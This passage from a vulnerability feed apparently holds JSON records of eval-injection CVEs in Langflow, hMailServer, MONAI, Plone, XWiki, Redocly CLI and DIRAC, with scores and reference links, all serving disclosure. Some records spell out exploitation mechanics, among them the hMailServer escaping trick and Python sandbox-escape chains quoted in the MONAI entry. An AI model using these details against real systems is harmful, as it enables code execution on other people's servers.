code.","cveId":"CVE-2024-42002","cvssScore":8.6,"cvssVector":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","severity":"high","vendor":null,"product":null,"affectedVersions":[],"cwes":["CWE-94","CWE-95"],"tags":["nvd","status:received","status:awaiting-analysis"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://github.com/ros2/ros2cli/pull/1001","type":"advisory","title":"security@ubuntu.com"},{"url":"https://github.com/ros2/ros2cli/pull/133#discussion_r223081766","type":"advisory","title":"security@ubuntu.com"}],"epssScore":0.0016,"epssPercentile":0.04544,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-09-28T22:17:28.617Z","addedAt":"2026-09-28T23:50:39.269Z","updatedAt":"2026-09-30T15:50:41.860Z","epssUpdatedAt":"2026-10-08T12:00:21.000Z","nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2024-42002","note":"ingested from NVD"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2024-42002","note":"authoritative record"}]},{"id":"cb5ca2f2-78b9-4cb3-be83-82edd84bb340","slug":"cve-2026-101861","externalId":"CVE-2026-101861","source":"NVD","sourceType":"cve-db","type":"vulnerability","title":"CVE-2026-101861 — Langflow 1.0.16 before 1.12.0 and 0.0.94 before 1.12.0 contain an unsafe eval() vulnerability in schema.py that allows authenticated attackers to a…","description":"Langflow 1.0.16 before 1.12.0 and 0.0.94 before 1.12.0 contain an unsafe eval() vulnerability in schema.py that allows authenticated attackers to achieve code execution by placing a Python object with a malicious __repr__ method into component input options lists. The eval() sink is triggered when a component is converted into a LangChain tool via ComponentToolkit.get_tools(), including during custom component saves through the API, by interpolating options into a Literal type string that is passed directly to eval() without safe evaluation controls.","cveId":"CVE-2026-101861","cvssScore":2.1,"cvssVector":"CVSS:4.0/AV:N/AC:H/AT:P/PR:H/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","severity":"low","vendor":null,"product":null,"affectedVersions":[],"cwes":["CWE-94","CWE-95"],"tags":["nvd","status:received","status:awaiting-analysis"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://github.com/langflow-ai/langflow/releases#release-v1.12.0","type":"advisory","title":"disclosure@vulncheck.com"},{"url":"https://github.com/langflow-ai/langflow/security/advisories/GHSA-33p4-w7j3-33mw","type":"advisory","title":"disclosure@vulncheck.com"}],"epssScore":0.00197,"epssPercentile":0.08575,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-09-28T16:17:13.157Z","addedAt":"2026-09-28T17:50:41.317Z","updatedAt":"2026-09-30T21:50:42.911Z","epssUpdatedAt":"2026-10-08T12:00:21.000Z","nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-101861","note":"ingested from NVD"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-101861","note":"authoritative record"}]},{"id":"aa079f9d-9373-43ec-94c9-b3c2ad44e758","slug":"cve-2026-100741","externalId":"CVE-2026-100741","source":"NVD","sourceType":"cve-db","type":"vulnerability","title":"CVE-2026-100741 — Eval injection in the JScript event-script dispatcher in Progressive Robot Ltd's hMailServer, versions 6.0.0 through 6.3.3 on Windows, allows a rem…","description":"Eval injection in the JScript event-script dispatcher in Progressive Robot Ltd's hMailServer, versions 6.0.0 through 6.3.3 on Windows, allows a remote, unauthenticated attacker to run arbitrary JScript inside the hMailServer service process, with the privileges of the service account, via a password containing a backslash followed by an apostrophe, sent in any logon (SMTP AUTH, POP3, IMAP) that names an existing, active account. Exploitation requires a non-default configuration: event scripting enabled (off by default), the script language set to JScript (the default is VBScript), and an OnClientValidatePassword handler defined in the event script. The server wrote event values into the handler call as JScript string literals, escaping the apostrophe but not the backslash, so such a value closes the literal and the rest of it is parsed as script. The same flaw is reachable by a remote POP3 server through the message UID it returns, where an OnExternalAccountDownload handler is defined, and by a remote SMTP server through the error reply it rejects a delivery with, where an OnDeliveryFailed handler is defined. Before 6.2.25 the injected script can create any COM object, and from 6.2.25 it can with the default ScriptAllowedObjects value of '*'; WScript.Shell among them gives command execution as the service account. VBScript event scripts and the Linux builds of Progressive Robot Ltd's hMailServer are not affected.","cveId":"CVE-2026-100741","cvssScore":9.8,"cvssVector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","severity":"critical","vendor":null,"product":null,"affectedVersions":[],"cwes":["CWE-95"],"tags":["nvd","status:received","status:awaiting-analysis"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://gitlab.com/Progressiverobot/hmailserver/-/commit/5a3de9001d6c5e833662ada8e44ce10d42d76b1a","type":"advisory","title":"cve@gitlab.com"},{"url":"https://gitlab.com/Progressiverobot/hmailserver/-/releases/v6.3.4","type":"advisory","title":"cve@gitlab.com"}],"epssScore":0.01729,"epssPercentile":0.76889,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-09-27T08:16:26.813Z","addedAt":"2026-09-27T09:50:37.762Z","updatedAt":"2026-09-29T21:50:40.422Z","epssUpdatedAt":"2026-10-08T12:00:21.000Z","nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-100741","note":"ingested from NVD"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-100741","note":"authoritative record"}]},{"id":"93194396-7072-47ad-a27a-704ef6cff844","slug":"cve-2026-100842","externalId":"CVE-2026-100842","source":"NVD","sourceType":"cve-db","type":"vulnerability","title":"CVE-2026-100842 — MONAI through 1.6.0 contains an eval injection vulnerability in _get_fake_spatial_shape() in monai/bundle/scripts.py.","description":"MONAI through 1.6.0 contains an eval injection vulnerability in _get_fake_spatial_shape() in monai/bundle/scripts.py. The function validates shape expressions with a helper that walks the AST and only collects ast.Name nodes, rejecting any name other than 'p' or 'n', before passing the string to eval(). Expressions built solely from constants and attribute, subscript, or call nodes (for example \"(1).__class__.__bases__[0].__subclasses__()\" or \"int.__class__.__init__.__globals__\") contain no ast.Name nodes and therefore bypass the allowlist. Because the shape value originates from bundle metadata consumed by _get_real_input_data and verify_net_in_out (reachable through the bundle 'verify_net_in_out' CLI flow), an attacker who can influence a bundle's metadata can escape the eval sandbox via object introspection chains and achieve code execution in this non-default flow.","cveId":"CVE-2026-100842","cvssScore":7.3,"cvssVector":"CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","severity":"high","vendor":"project-monai","product":"monai","affectedVersions":["<= 1.6.0","pkg:pypi/monai < 1.6.1rc0"],"cwes":["CWE-95"],"tags":["nvd","status:received","status:awaiting-analysis","status:analyzed","osv","osv:pysec-2026-4017","ecosystem:pypi"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://github.com/Project-MONAI/MONAI/security/advisories/GHSA-h89g-r5pc-wxfm","type":"exploit","title":"OSV evidence"},{"url":"https://www.vulncheck.com/advisories/monai-through-1.6.0-get-fake-spatial-shape-eval-sandbox-bypass-via-attribute-chains","type":"advisory","title":"OSV advisory"},{"url":"https://osv.dev/vulnerability/PYSEC-2026-4017","type":"advisory","title":"OSV PYSEC-2026-4017"}],"epssScore":0.00148,"epssPercentile":0.03489,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-09-27T02:17:22.693Z","addedAt":"2026-09-27T03:50:37.875Z","updatedAt":"2026-10-01T13:54:24.428Z","epssUpdatedAt":"2026-10-08T12:00:21.000Z","nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-100842","note":"ingested from NVD"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-100842","note":"authoritative record"},{"label":"OSV","url":"https://osv.dev/vulnerability/PYSEC-2026-4017"}]},{"id":"ce5ed5de-1e6d-4ae6-a7a9-033a08fb7408","slug":"cve-2026-100840","externalId":"CVE-2026-100840","source":"NVD","sourceType":"cve-db","type":"vulnerability","title":"CVE-2026-100840 — MONAI through 1.6.0 contains a remote code execution vulnerability in the bundle configuration engine that resolves _target_ values to arbitrary im…","description":"MONAI through 1.6.0 contains a remote code execution vulnerability in the bundle configuration engine that resolves _target_ values to arbitrary importable callables without an allow list and passes $ expressions to Python eval(). Attackers can publish a malicious bundle with crafted configuration containing arbitrary code that executes when a victim loads the bundle using monai.bundle.load() or monai.bundle.run().","cveId":"CVE-2026-100840","cvssScore":8.5,"cvssVector":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","severity":"high","vendor":"project-monai","product":"monai","affectedVersions":["<= 1.6.0","pkg:pypi/monai < 1.6.1rc0"],"cwes":["CWE-95"],"tags":["nvd","status:received","status:awaiting-analysis","status:analyzed","osv","osv:pysec-2026-4015","ecosystem:pypi"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://github.com/Project-MONAI/MONAI/security/advisories/GHSA-873f-pvrv-4x83","type":"exploit","title":"OSV evidence"},{"url":"https://www.vulncheck.com/advisories/monai-through-1.6.0-remote-code-execution-via-bundle-configuration","type":"advisory","title":"OSV advisory"},{"url":"https://osv.dev/vulnerability/PYSEC-2026-4015","type":"advisory","title":"OSV PYSEC-2026-4015"}],"epssScore":0.00215,"epssPercentile":0.10965,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-09-27T02:17:22.387Z","addedAt":"2026-09-27T03:50:37.862Z","updatedAt":"2026-10-01T13:54:24.414Z","epssUpdatedAt":"2026-10-08T12:00:21.000Z","nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-100840","note":"ingested from NVD"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-100840","note":"authoritative record"},{"label":"OSV","url":"https://osv.dev/vulnerability/PYSEC-2026-4015"}]},{"id":"eceb2106-66d5-4f6a-9c2c-a49639da88f2","slug":"cve-2026-57149","externalId":"CVE-2026-57149","source":"NVD","sourceType":"cve-db","type":"vulnerability","title":"CVE-2026-57149 — plone.app.portlets.portlets provides a Plone-specific user interface for plone.portlets, as well as a standard set of portlets that ship with Plone.","description":"plone.app.portlets.portlets provides a Plone-specific user interface for plone.portlets, as well as a standard set of portlets that ship with Plone. Starting in version 5.0.0 and prior to versions 5.0.8, 6.0.4, and 7.0.2, the Classic portlet (plone.app.portlets.portlets.classic) used its user-supplied template/macro fields to build a TALES path expression that was then evaluated by the TAL path() helper. Because the value was interpreted as a full TALES expression, a user able to add or edit a Classic portlet could supply a crafted value that escapes simple path traversal and is evaluated as arbitrary code. This is exploitable by any authenticated user who can configure a Classic portlet - which, with the default role map, includes regular users on their personal dashboard. The result is code execution in the context of the Plone process, i.e. a privilege escalation across the trust boundary between an authenticated web user and the server-side process. The problem has been patched in `plone.app.portlets` 5.0.8, 6.0.4, and 7.0.2. Some workarounds are available.  Restrict who can manage portlets: remove the `plone.app.portlets.ManageOwnPortlets` permission from untrusted roles, and limit Manage portlets to trusted administrators (usually this is already restricted to the Manager and Site Administrator roles).  Where the Classic portlet is not needed, unregister it so it cannot be added. This would need to be done by editing a `portlets.xml` in your own code. One may also effectively disable showing the classic portlet by customising its template. In the Zope Management Interface go to the `portal_view_customizations` tool, locate the `classic.pt` template and click it. Click the Customize button.  Remove all text and replace it with `<div>The classic portlet was disabled.</div>`. (This is not a recommended way of customizing a template, but in this case it is quite effective.)","cveId":"CVE-2026-57149","cvssScore":9.9,"cvssVector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H","severity":"critical","vendor":"PyPI","product":"plone-app-portlets","affectedVersions":["pkg:pypi/plone-app-portlets >= 7.0.0, < 7.0.2","pkg:pypi/plone-app-portlets >= 6.0.0, < 6.0.4","pkg:pypi/plone-app-portlets >= 5.0.0, < 5.0.8","pkg:pypi/plone-app-portlets >= 5.0.0, < 5.0.8 || >= 6.0.0, < 6.0.4 || >= 7.0.0, < 7.0.2 || >= 5.0.0, < 5.0.8"],"cwes":["CWE-95"],"tags":["nvd","status:received","status:awaiting-analysis","osv","osv:ghsa-rr49-f9g6-c9r5","ecosystem:pypi","osv:pysec-2026-4138"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://github.com/plone/plone.app.portlets/security/advisories/GHSA-rr49-f9g6-c9r5","type":"other","title":"OSV web"},{"url":"https://osv.dev/vulnerability/GHSA-rr49-f9g6-c9r5","type":"advisory","title":"OSV GHSA-rr49-f9g6-c9r5"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-57149","type":"advisory","title":"OSV advisory"},{"url":"https://github.com/plone/plone.app.portlets/commit/1d9cacacfad9ed08b890dadc6e75741e295dc151","type":"other","title":"OSV web"},{"url":"https://github.com/plone/plone.app.portlets/commit/8a0641dc4054a2b13834bba00c67cd9a2fd189e1","type":"other","title":"OSV web"},{"url":"https://github.com/plone/plone.app.portlets/commit/fb979f01b57dd2fc06c90ee6577eb5eb285da8f1","type":"other","title":"OSV web"},{"url":"https://github.com/plone/plone.app.portlets","type":"vendor","title":"OSV package"},{"url":"https://github.com/plone/plone.app.portlets/releases/tag/5.0.8","type":"other","title":"OSV web"},{"url":"https://github.com/plone/plone.app.portlets/releases/tag/6.0.4","type":"other","title":"OSV web"},{"url":"https://github.com/plone/plone.app.portlets/releases/tag/7.0.2","type":"other","title":"OSV web"},{"url":"https://osv.dev/vulnerability/PYSEC-2026-4138","type":"advisory","title":"OSV PYSEC-2026-4138"},{"url":"https://pypi.org/project/plone-app-portlets","type":"vendor","title":"OSV package"},{"url":"https://github.com/advisories/GHSA-rr49-f9g6-c9r5","type":"advisory","title":"OSV advisory"}],"epssScore":0.00638,"epssPercentile":0.48977,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-09-22T19:16:43.893Z","addedAt":"2026-09-22T19:50:41.964Z","updatedAt":"2026-10-01T19:54:36.246Z","epssUpdatedAt":"2026-10-08T12:00:21.000Z","nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-57149","note":"ingested from NVD"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-57149","note":"authoritative record"},{"label":"OSV","url":"https://osv.dev/vulnerability/GHSA-RR49-F9G6-C9R5"}]},{"id":"909f00d2-bf18-4861-8e90-53f8b0f2d460","slug":"cve-2026-76974","externalId":"CVE-2026-76974","source":"NVD","sourceType":"cve-db","type":"vulnerability","title":"CVE-2026-76974 — SAP Fiori Launchpad does not sufficiently validate certain user-controlled input.","description":"SAP Fiori Launchpad does not sufficiently validate certain user-controlled input. An unauthenticated attacker could craft a malicious link that, when clicked by an authenticated user, causes the browser to load attacker-controlled content from an external location. This could be used to exfiltrate sensitive information from the victim's session, resulting in a high impact on confidentiality. There is no impact on integrity and availability.","cveId":"CVE-2026-76974","cvssScore":5.3,"cvssVector":"CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N","severity":"medium","vendor":null,"product":null,"affectedVersions":[],"cwes":["CWE-95"],"tags":["nvd","status:received","status:awaiting-analysis"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://me.sap.com/notes/3680888","type":"advisory","title":"cna@sap.com"},{"url":"https://url.sap/sapsecuritypatchday","type":"advisory","title":"cna@sap.com"}],"epssScore":0.00349,"epssPercentile":0.26441,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-09-22T01:16:53.837Z","addedAt":"2026-09-22T01:50:36.980Z","updatedAt":"2026-09-22T19:50:40.757Z","epssUpdatedAt":"2026-10-08T12:00:21.000Z","nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-76974","note":"ingested from NVD"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-76974","note":"authoritative record"}]},{"id":"d99ade11-26a9-44bd-8983-e179f140ee6e","slug":"cve-2026-78847","externalId":"CVE-2026-78847","source":"NVD","sourceType":"cve-db","type":"vulnerability","title":"CVE-2026-78847 — An issue in gray-matter All versions (verified on 4.0.3) allows the JavaScript engine in lib/engines.js using eval() to parse front matter when lan…","description":"An issue in gray-matter All versions (verified on 4.0.3) allows the JavaScript engine in lib/engines.js using eval() to parse front matter when language is js/javascript.This allows arbitrary code execution.","cveId":"CVE-2026-78847","cvssScore":9.8,"cvssVector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","severity":"critical","vendor":null,"product":null,"affectedVersions":[],"cwes":["CWE-95"],"tags":["nvd","status:received","status:deferred"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://blog.checo.cc/en/posts/Security/1","type":"advisory","title":"cve@mitre.org"},{"url":"https://github.com/jonschlinkert/gray-matter/issues/112","type":"advisory","title":"cve@mitre.org"},{"url":"https://github.com/jonschlinkert/gray-matter/issues/131","type":"advisory","title":"cve@mitre.org"},{"url":"https://github.com/jonschlinkert/gray-matter/issues/182","type":"advisory","title":"134c704f-9b21-4f2e-91b3-4a467353bcc0"}],"epssScore":0.00596,"epssPercentile":0.46819,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-09-21T22:16:58.863Z","addedAt":"2026-09-21T23:50:36.645Z","updatedAt":"2026-09-22T21:50:40.790Z","epssUpdatedAt":"2026-10-08T12:00:21.000Z","nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-78847","note":"ingested from NVD"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-78847","note":"authoritative record"}]},{"id":"16559a29-8090-4659-b317-de48f10e2059","slug":"cve-2025-53837","externalId":"CVE-2025-53837","source":"NVD","sourceType":"cve-db","type":"vulnerability","title":"CVE-2025-53837 — XWiki Rendering is a generic rendering system that converts textual input in a given syntax (wiki syntax, HTML, etc) into another syntax (XHTML, etc).","description":"XWiki Rendering is a generic rendering system that converts textual input in a given syntax (wiki syntax, HTML, etc) into another syntax (XHTML, etc). Prior to versions 14.10.2 and 15.0 RC1, any user who can edit their own user profile or any other document can execute arbitrary script macros including Groovy and Python macros that allow remote code execution including unrestricted read and write access to all wiki contents. The reason is that rendering output is included as content of HTML macros without further escaping and it is thus possible to close the HTML macro and inject script macros that are executed with programming rights. This has been patched in XWiki 14.10.2 and 15.0 RC1 by making sure that rendering output cannot close the surrounding HTML macro. A possible workaround is available. It is, in principle, possible to add escaping to all places where rendering output is used in wiki documents, but at the moment there is no list of them.","cveId":"CVE-2025-53837","cvssScore":9.9,"cvssVector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H","severity":"critical","vendor":"Maven","product":"org.xwiki.rendering:xwiki-rendering-xml","affectedVersions":["pkg:maven/org.xwiki.rendering/xwiki-rendering-xml < 14.10.2"],"cwes":["CWE-95"],"tags":["nvd","status:received","osv","osv:ghsa-26vp-8gxg-v4pg","ecosystem:maven","status:deferred"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://github.com/xwiki/xwiki-rendering/commit/92bc8095ed3acce15ab200c8525e1623b4898be5","type":"advisory","title":"security-advisories@github.com"},{"url":"https://github.com/xwiki/xwiki-rendering/releases/tag/xwiki-rendering-14.10.2","type":"advisory","title":"security-advisories@github.com"},{"url":"https://github.com/xwiki/xwiki-rendering/releases/tag/xwiki-rendering-15.0-rc-1","type":"advisory","title":"security-advisories@github.com"},{"url":"https://github.com/xwiki/xwiki-rendering/security/advisories/GHSA-26vp-8gxg-v4pg","type":"advisory","title":"security-advisories@github.com"},{"url":"https://jira.xwiki.org/browse/XRENDERING-693","type":"advisory","title":"security-advisories@github.com"},{"url":"https://jira.xwiki.org/browse/XWIKI-20313","type":"advisory","title":"security-advisories@github.com"},{"url":"https://jira.xwiki.org/browse/XWIKI-20327","type":"advisory","title":"security-advisories@github.com"},{"url":"https://osv.dev/vulnerability/GHSA-26vp-8gxg-v4pg","type":"advisory","title":"OSV GHSA-26vp-8gxg-v4pg"},{"url":"https://github.com/xwiki/xwiki-rendering","type":"vendor","title":"OSV package"}],"epssScore":0.00642,"epssPercentile":0.49193,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-09-18T16:17:03.527Z","addedAt":"2026-09-18T17:50:36.712Z","updatedAt":"2026-09-24T21:50:42.771Z","epssUpdatedAt":"2026-10-08T12:00:21.000Z","nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2025-53837","note":"ingested from NVD"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2025-53837","note":"authoritative record"},{"label":"OSV","url":"https://osv.dev/vulnerability/GHSA-26VP-8GXG-V4PG"}]},{"id":"5bb87352-ac4d-45a4-abf2-9dc4f0aefa5d","slug":"cve-2026-63325","externalId":"CVE-2026-63325","source":"NVD","sourceType":"cve-db","type":"vulnerability","title":"CVE-2026-63325 — Redocly CLI makes OpenAPI validation, linting, and documentation workflows easier.","description":"Redocly CLI makes OpenAPI validation, linting, and documentation workflows easier. Prior to version 2.33.0 of @redocly/respect-core and @redocly/cli, the respect command dynamically evaluates $faker runtime expressions in Arazzo descriptions. A crafted expression can traverse constructor, prototype, or __proto__ properties in packages/respect-core/src/modules/context-parser/get-value-from-context.ts, reach the JavaScript Function constructor, and execute arbitrary code when a user processes an untrusted description. The executed code runs with the privileges of the CLI process and can execute shell commands or read CI secrets. Users processing only trusted, self-authored workflows are not affected. This issue is fixed in @redocly/respect-core and @redocly/cli version 2.33.0.","cveId":"CVE-2026-63325","cvssScore":7.8,"cvssVector":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H","severity":"high","vendor":null,"product":null,"affectedVersions":[],"cwes":["CWE-94","CWE-95"],"tags":["nvd","status:received","status:deferred"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://github.com/Redocly/redocly-cli/commit/d26d452368066be1400f43cea915dd9ea508e18b","type":"advisory","title":"security-advisories@github.com"},{"url":"https://github.com/Redocly/redocly-cli/pull/2881","type":"advisory","title":"security-advisories@github.com"},{"url":"https://github.com/Redocly/redocly-cli/pull/2922","type":"advisory","title":"security-advisories@github.com"},{"url":"https://github.com/Redocly/redocly-cli/releases/tag/@redocly/respect-core@1.34.17","type":"advisory","title":"security-advisories@github.com"},{"url":"https://github.com/Redocly/redocly-cli/releases/tag/@redocly/respect-core@2.33.0","type":"advisory","title":"security-advisories@github.com"},{"url":"https://github.com/Redocly/redocly-cli/security/advisories/GHSA-xw2f-5386-m542","type":"advisory","title":"security-advisories@github.com"}],"epssScore":0.00224,"epssPercentile":0.11918,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-09-16T19:17:24.317Z","addedAt":"2026-09-16T19:50:47.232Z","updatedAt":"2026-09-24T21:50:42.241Z","epssUpdatedAt":"2026-10-08T12:00:21.000Z","nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-63325","note":"ingested from NVD"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-63325","note":"authoritative record"}]},{"id":"fb400ead-940f-4cc0-ba1a-c1baa11dc1c2","slug":"cve-2026-61667","externalId":"CVE-2026-61667","source":"NVD","sourceType":"cve-db","type":"vulnerability","title":"CVE-2026-61667 — DIRAC is an interware, meaning a software framework for distributed computing.","description":"DIRAC is an interware, meaning a software framework for distributed computing. Prior to versions 8.0.79, 9.0.22, and 9.1.10, DataManagementSystem/Service/FileCatalogHandler.py checkDataset forwards an authenticated caller-controlled datasets value to DatasetManager.py __checkDataset, where datasetName is interpolated into an FC_MetaDatasets SQL query without parameterization. The injected query can control the returned MetaQuery value, which is passed to Python eval and permits command execution as the account running the DIRAC services. Successful exploitation can expose dirac.cfg, database passwords, stored proxies, and tokens, fully compromise the DIRAC system, and allow alteration of local log evidence. This issue is fixed in versions 8.0.79, 9.0.22, and 9.1.10.","cveId":"CVE-2026-61667","cvssScore":9.9,"cvssVector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H","severity":"critical","vendor":"PyPI","product":"dirac","affectedVersions":["pkg:pypi/dirac >= 6, < 8.0.79","pkg:pypi/dirac >= 8.1.0a1, < 9.0.22","pkg:pypi/dirac >= 9.1.0, < 9.1.10","pkg:pypi/dirac >= 6, < 8.0.79 || >= 8.1.0a1, < 9.0.22 || >= 9.1.0, < 9.1.10"],"cwes":["CWE-89","CWE-95"],"tags":["osv","osv:ghsa-m4m7-4cw8-62j6","ecosystem:pypi","osv:pysec-2026-3463","nvd","status:received","status:deferred"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://osv.dev/vulnerability/GHSA-m4m7-4cw8-62j6","type":"advisory","title":"OSV GHSA-m4m7-4cw8-62j6"},{"url":"https://github.com/DIRACGrid/DIRAC/security/advisories/GHSA-m4m7-4cw8-62j6","type":"advisory","title":"security-advisories@github.com"},{"url":"https://github.com/DIRACGrid/DIRAC","type":"vendor","title":"OSV package"},{"url":"https://pypi.org/project/DIRAC/8.0.79","type":"other","title":"OSV web"},{"url":"https://pypi.org/project/DIRAC/9.0.22","type":"other","title":"OSV web"},{"url":"https://pypi.org/project/DIRAC/9.1.10","type":"other","title":"OSV web"},{"url":"https://osv.dev/vulnerability/PYSEC-2026-3463","type":"advisory","title":"OSV PYSEC-2026-3463"},{"url":"https://pypi.org/project/dirac","type":"vendor","title":"OSV package"},{"url":"https://github.com/advisories/GHSA-m4m7-4cw8-62j6","type":"advisory","title":"OSV advisory"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-61667","type":"advisory","title":"OSV advisory"},{"url":"https://github.com/DIRACGrid/DIRAC/commit/106f6efb40eb7318473fc09fc48083f1f864460a","type":"advisory","title":"security-advisories@github.com"},{"url":"https://github.com/DIRACGrid/DIRAC/commit/55ecbd729242ddbe06251b57895873cc468f5a1a","type":"advisory","title":"security-advisories@github.com"},{"url":"https://github.com/DIRACGrid/DIRAC/commit/5a5def88d65a18c77af9f2900ffb5866d6489d62","type":"advisory","title":"security-advisories@github.com"},{"url":"https://github.com/DIRACGrid/DIRAC/commit/66cfc8bf1dc13a6d38bf0c5654d5b551d76dce9b","type":"advisory","title":"security-advisories@github.com"},{"url":"https://github.com/DIRACGrid/DIRAC/commit/6f6fe65f27b6913916ef77a77a09918b94029c0a","type":"advisory","title":"security-advisories@github.com"},{"url":"https://github.com/DIRACGrid/DIRAC/commit/fabf08a4a403fdd92d3445771528fa54b3ee902f","type":"advisory","title":"security-advisories@github.com"},{"url":"https://github.com/DIRACGrid/DIRAC/releases/tag/v8.0.79","type":"advisory","title":"security-advisories@github.com"},{"url":"https://github.com/DIRACGrid/DIRAC/releases/tag/v9.0.22","type":"advisory","title":"security-advisories@github.com"},{"url":"https://github.com/DIRACGrid/DIRAC/releases/tag/v9.1.10","type":"advisory","title":"security-advisories@github.com"}],"epssScore":0.01213,"epssPercentile":0.67615,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-09-15T18:17:27.050Z","addedAt":"2026-07-29T20:52:09.787Z","updatedAt":"2026-09-30T19:50:41.691Z","epssUpdatedAt":"2026-10-08T12:00:21.000Z","nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-61667","note":"ingested from NVD"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-61667","note":"authoritative 